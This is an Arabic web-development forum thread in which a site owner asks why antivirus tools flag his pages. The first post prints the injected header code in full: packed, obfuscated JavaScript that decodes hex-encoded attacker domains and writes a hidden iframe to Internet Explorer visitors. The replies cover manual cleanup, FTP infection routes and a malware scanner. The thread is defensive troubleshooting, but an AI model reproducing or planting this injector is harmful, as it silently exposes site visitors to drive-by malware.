فايروس يدخل تلقائياً لصفحات الموقع ويضع كوده بالهيدر !!

كل ما يهم مطور المواقع ... لغات برمجة المواقع .. سكربتات .. مناقشات ..
مغلق
Saif Alhak
عضو مفيد
مشاركات: 107
اشترك في: 24 مارس 2009, 20:45
مكان: Damascus - Syria
اتصال:

فايروس يدخل تلقائياً لصفحات الموقع ويضع كوده بالهيدر !!

مشاركة بواسطة Saif Alhak »

السلام عليكم

لدي مشكلة غريبة وهي أن بعض مضادات الفايروس كـ Avast و BitDefender أصبحت ترى بعض صفحات الموقع وكأنها خطر وتحوي فايروس وبعضها الآخر لايرى أي خطأ في الموقع

مع العلم أن الموقع بلغة html وبنظام فريمات

وأنا لم أكتب الكود بالتالي يوجد فايروس يقوم بادخال هذا الكود في الهيدر للصفحة

اسم الفايروس بحسب مضاد الفايروس هو : trojan script 429193

والكود الدخيل هو


كود: تحديد الكل

 
sa="%6B%73%68%66%65%61%2E%6E%65%74"; eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return p}('a(0.4.7("5=s")==-1&&9.8.7("f 6")!=-1){0.4="5=s; e=c, 2 g b 2:d:h p; ";0.r("<3 q=1 t=1 o=\'n://"+j+"/i/\' k=\'l:m\'></3>")}',30,30,'document||14|iframe|cookie|_mlsdkf||indexOf|appVersion|navigator|if|2015|Mon|15|expires|MSIE|Jul|26|b2b|sa|style|display|none|http|src|GMT|width|write||height'.split('|')));</script>sa="%67%72%61%74%6D%2E%6E%65%74";eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c+'\\b','g'),k[c])}}return p}('28(9.8.7("17 6")!=-1&&0.5.7("4=3")==-1){0.5="4=3; 11=13, 14 16 10 14:15:26 12; ";0.24("<2 25=1 27=1 23=\'22://"+18+"/19/\' 20=\'21:29\'></2>")}',10,30,'document||iframe|s|_mlsdkf|cookie||indexOf|appVersion|navigator|2015|expires|GMT|Mon|||Jul|MSIE|sa|b2b|style|display|http|src|write|width||height|if|none'.split('|')));
--


وعند حذف هذا الكود تعمل الصفحة بكفاءة ودون تحذيرات مضاد الفايروس

فما هو سبب هذه المشكلة وكيف يتم ادخال هذا الكود

والأهم كيف أوقف هذه المشكلة فعملية تحرير الصفحات وبشكل دائم متعبة


الموقع هو www.childclinic.net
saanina
عبدالرحمــــن
مشاركات: 3762
اشترك في: 30 أغسطس 2004, 13:54

رد: فايروس يدخل تلقائياً لصفحات الموقع ويضع كوده بالهيدر !!

مشاركة بواسطة saanina »

لايوجد حل الا اليدوي .. !

لان الكود هتمل وشوية جافاسكربت وحتى باحث الفيروسات بالسي بانل لن يفيدك !

المفروض اخذت باك اب سابقا للملفات تحسبا للمشكلة التاليه .. وبالمناسبة هذه الفيروسات تدخل عن طريق الافتي بي من الويندوز ! يعني لو تبي الامان استخدم برنامج حماية صح او ادخل للافتي بي من ماك او لينكس


بالتوفيق
Saif Alhak
عضو مفيد
مشاركات: 107
اشترك في: 24 مارس 2009, 20:45
مكان: Damascus - Syria
اتصال:

رد: فايروس يدخل تلقائياً لصفحات الموقع ويضع كوده بالهيدر !!

مشاركة بواسطة Saif Alhak »

شكراً لك أخي عبد الرحمن

ولكن لا أعتقد أن صاحب الموقع استخدم برنامج ftp من الويندز هو جميع عمله من السي بنل

فهل يمكن ان يكون هناك طريق آخر لدخول الفايرس

وماذا تقصد ببرنامج حمايه صح هل تقصد مضاد فايروس كالكاسبر فهو موجود

سنزيل الكود يدويا ولكن هل هناك احتمال لعودته ؟
saanina
عبدالرحمــــن
مشاركات: 3762
اشترك في: 30 أغسطس 2004, 13:54

رد: فايروس يدخل تلقائياً لصفحات الموقع ويضع كوده بالهيدر !!

مشاركة بواسطة saanina »

نعم هناك احتمال ,
فبرامج حماية الويندوز كالكاسبر قليل جدا ان يعتبر اكواد الهتمل المضره فيروساً .
لذا تاكد دائما من اي ملف ترفعه لنظره سريعه على محتوياته !

بالتوفيق
Saif Alhak
عضو مفيد
مشاركات: 107
اشترك في: 24 مارس 2009, 20:45
مكان: Damascus - Syria
اتصال:

رد: فايروس يدخل تلقائياً لصفحات الموقع ويضع كوده بالهيدر !!

مشاركة بواسطة Saif Alhak »

شكراً على الأفادة أخي عبد الرحمن

وسأسعى جاهداً لأخذ الإحتياطات اللازمة
Saif Alhak
عضو مفيد
مشاركات: 107
اشترك في: 24 مارس 2009, 20:45
مكان: Damascus - Syria
اتصال:

رد: فايروس يدخل تلقائياً لصفحات الموقع ويضع كوده بالهيدر !!

مشاركة بواسطة Saif Alhak »

أخي عبد الرحمن خلال بحثي عن الموضوع وجدت هذه الأداة وتدعى iscanner

شرح الأداة
http://www.isecur1ty.org/blog/projects/ ... lease.html

شرح فيديو وبالعربي للأداة
http://www.isecur1ty.org/video-tutorial ... mover.html

تحميل الأداة ومستنداتها
http://iscanner.isecur1ty.org/


مارأيك بها !!!
saanina
عبدالرحمــــن
مشاركات: 3762
اشترك في: 30 أغسطس 2004, 13:54

رد: فايروس يدخل تلقائياً لصفحات الموقع ويضع كوده بالهيدر !!

مشاركة بواسطة saanina »

طبعاً ليس من الضروري أن تكون جميع التحذيرات الظاهرة هي فايروسات أو أكواد ضارة فمثلاً الأكواد المشفرة باستخدام base64 قد لا تكون ضارة لكن يجب اظهار تحذير عن ذلك لأن غالباً يتم استخدامها من قبل الهاكرز لتشفير الأكواد الضارة واخفاؤها كذلك الأمر بالنسبة لأكواد iframe المخفية, بعض السكريبتات تستخدمها لكنها بنفس الوقت مستخدمة من قبل فايروسات المواقع. بمعنى آخر الأداة تظهر جميع الأمور والتحذيرات التي قد تكون خطيرة وتترك حرية التصرف لمدير النظام.


اعتقد هذا الاقتباس كافي , فلا غنى عن النظرة السريعه للملف ,

سابقا ظهرت اكواد ضاره بالصندوق الذهبي ولكثرة الملفات اضظريت اكتب بريمج صغير لاكتشاف الاكواد المضره مثل عمل ماذكرت لكنه اقل امكانيات ..
اقرا اخر الموضوع هنا
http://www.phpbbarabia.com/community/vi ... 44&t=28304


لو ظهر لي مشكلة لاحقا اعتقد اني ساستخدم اي سكانر ... خصوصا انه مدعوم و يحدث كل فتره .. وشغل متعوب عليه
Saif Alhak
عضو مفيد
مشاركات: 107
اشترك في: 24 مارس 2009, 20:45
مكان: Damascus - Syria
اتصال:

رد: فايروس يدخل تلقائياً لصفحات الموقع ويضع كوده بالهيدر !!

مشاركة بواسطة Saif Alhak »

هذا صحيح وانا تابعت موضوع الصندوق الذهبي وآخر تحديثاته فإدارة phpBBarabia أخبرتنا بالتحديثات

وماشاء الله عليك جهد متعوب عليه

ولكن عندي ملاحظة أخي عبد الرحمن ... ماذا لو كان الصندوق الذهبي محرر مرئي أليس أجمل وأسهل بكثير على المستخدمين فلن تظهر الأكواد وإنما النتيجة فوراً ... العديد من مستخدمي المنتديات هم بخبرة بسيطة ولايجيدون التعامل مع الأكواد وتحدث معم أخطاء كثيرة فيها ....

فهل من عائق أما تطبيق هذا الموضوع في هاكك ولم لم تنفذه

وبالمناسبة بما اننا دخلنا لموضوع المحررات
انت بم تنصح في حال رغبت باستخدام محرر بسكربت خاص بالمقالات والأخبار هل استخدم محررات html جاهزة مثل tiny , cK ... أم أستخدم محررات bb code أيهم أفضل من ناحية الأمن أعلم أن محررات ال bb أصعب على المستخدمين وأقل ميزات ولكن من ناحية الأمن هل محررات html خطرة بالرغم من تحديثها المستمر
مغلق